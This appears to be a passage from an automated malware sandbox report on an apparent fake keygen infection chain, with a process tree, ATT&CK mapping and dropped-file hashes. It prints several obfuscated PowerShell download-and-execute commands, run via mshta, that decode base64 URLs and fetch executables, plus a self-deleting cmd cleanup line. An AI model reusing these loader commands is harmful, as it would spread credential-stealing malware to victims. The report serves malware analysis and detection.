                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1976
                  • C:\Users\Public\aru.exe
                    "C:\Users\Public\aru.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2444
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                      6⤵
                      • Loads dropped DLL
                      PID:1980
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                        7⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1152
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                          8⤵
                          • Loads dropped DLL
                          PID:1576
                          • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                            9⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1636
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                              "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                              10⤵
                              • Executes dropped EXE
                              PID:2824
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                          "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                          8⤵
                          • Executes dropped EXE
                          PID:916
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                          "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                          8⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks processor information in registry
                          PID:912
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /pid 912 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\322042692277184\\* & exit
                            9⤵
                              PID:2396
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /pid 912
                                10⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1004
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:1968
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2532
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2032
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2600
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2612
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2116
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:1260
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2184
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2636
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2760
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2584
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2572
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:1072
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2560
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2464
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2704
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2868
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2864
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2828
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2696
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2772
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2740
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2948
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2732
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2984
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:3052
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2944
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2640
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2072
                      • C:\Users\Public\aru.exe
                        "C:\Users\Public\aru.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2980
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\E169.tmp\b1.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of WriteProcessMemory
                  PID:1628
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1972
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 2
                  3⤵
                  • Delays execution with timeout.exe
                  PID:1728
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\E169.tmp\ba.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of WriteProcessMemory
                  PID:828
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Blocklisted process makes network request
                    • Loads dropped DLL
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1436
                    • C:\Users\Public\jvd.exe
                      "C:\Users\Public\jvd.exe"
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetWindowsHookEx
                      PID:2536
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        PID:2736
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                          "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                          7⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks processor information in registry
                          PID:2924
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /pid 2924 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\541495955487254\\* & exit
                            8⤵
                              PID:1440
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /pid 2924
                                9⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1364
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                          "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetWindowsHookEx
                          PID:2772
                          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:2944
                        • C:\Users\Public\jvd.exe
                          "C:\Users\Public\jvd.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:2904
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\E169.tmp\ba1.hta"
                    3⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of WriteProcessMemory
                    PID:964
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1232

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Persistence

              Modify Existing Service

              1
              T1031

              Defense Evasion

              Modify Registry

              4
              T1112

              Disabling Security Tools

              2
              T1089

              Install Root Certificate

              1
              T1130

              Credential Access

              Credentials in Files

              3
              T1081

              Discovery

              Query Registry

              2
              T1012

              System Information Discovery

              2
              T1082

              Collection

              Data from Local System

              3
              T1005

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\ProgramData\MSVCP140.dll
              • C:\ProgramData\VCRUNTIME140.dll
              • C:\ProgramData\freebl3.dll
              • C:\ProgramData\freebl3.dll
              • C:\ProgramData\mozglue.dll
              • C:\ProgramData\mozglue.dll
              • C:\ProgramData\msvcp140.dll
              • C:\ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • C:\ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • C:\ProgramData\softokn3.dll
              • C:\ProgramData\softokn3.dll
              • C:\ProgramData\sqlite3.dll
              • C:\ProgramData\sqlite3.dll
              • C:\ProgramData\vcruntime140.dll
              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_02742b4f-6ee1-4995-a440-083db21e7feb
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a1733a9-c78a-41f9-ba49-7e78bc3e775b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c3678641-ef84-4f3c-b5fa-b62cc017bafd
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d37abb17-abc2-4d0b-a491-4e3d00395463
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ffa80dfa-c16a-406a-aff4-4c0292945b76
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
              • C:\Users\Admin\AppData\Local\Temp\E169.tmp\Keygen.exe
              • C:\Users\Admin\AppData\Local\Temp\E169.tmp\Keygen.exe
              • C:\Users\Admin\AppData\Local\Temp\E169.tmp\b.hta
              • C:\Users\Admin\AppData\Local\Temp\E169.tmp\b1.hta
              • C:\Users\Admin\AppData\Local\Temp\E169.tmp\ba.hta
              • C:\Users\Admin\AppData\Local\Temp\E169.tmp\ba1.hta
              • C:\Users\Admin\AppData\Local\Temp\E169.tmp\m.hta
              • C:\Users\Admin\AppData\Local\Temp\E169.tmp\m1.hta
              • C:\Users\Admin\AppData\Local\Temp\E169.tmp\start.bat
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\InjcuA8Igy.exe
              • C:\Users\Admin\AppData\Local\Temp\InjcuA8Igy.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\RJ8FDi1gEA.exe
              • C:\Users\Admin\AppData\Local\Temp\RJ8FDi1gEA.exe
              • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
              • C:\Users\Admin\AppData\Local\Temp\Tcc5ffaSVd.exe
              • C:\Users\Admin\AppData\Local\Temp\Tcc5ffaSVd.exe
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\ouMCEaqHBb.exe
                MD5

                013db621a3351e3fb049efd2ccad79ff

                SHA1

                a23394ea54dbc5342a77938a2c285ee616185560

                SHA256

                df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                SHA512

                1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Public\abc.exe
              • C:\Users\Public\abc.exe
              • C:\Users\Public\abc.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\aru.exe
              • C:\Users\Public\jvd.exe
              • C:\Users\Public\jvd.exe
              • C:\Users\Public\jvd.exe
              • C:\Windows\temp\vlnwgyz1.inf
              • \??\PIPE\lsarpc
              • \??\PIPE\srvsvc
              • \??\PIPE\srvsvc
              • \ProgramData\mozglue.dll
              • \ProgramData\mozglue.dll
              • \ProgramData\mozglue.dll
              • \ProgramData\msvcp140.dll
              • \ProgramData\msvcp140.dll
              • \ProgramData\msvcp140.dll
              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

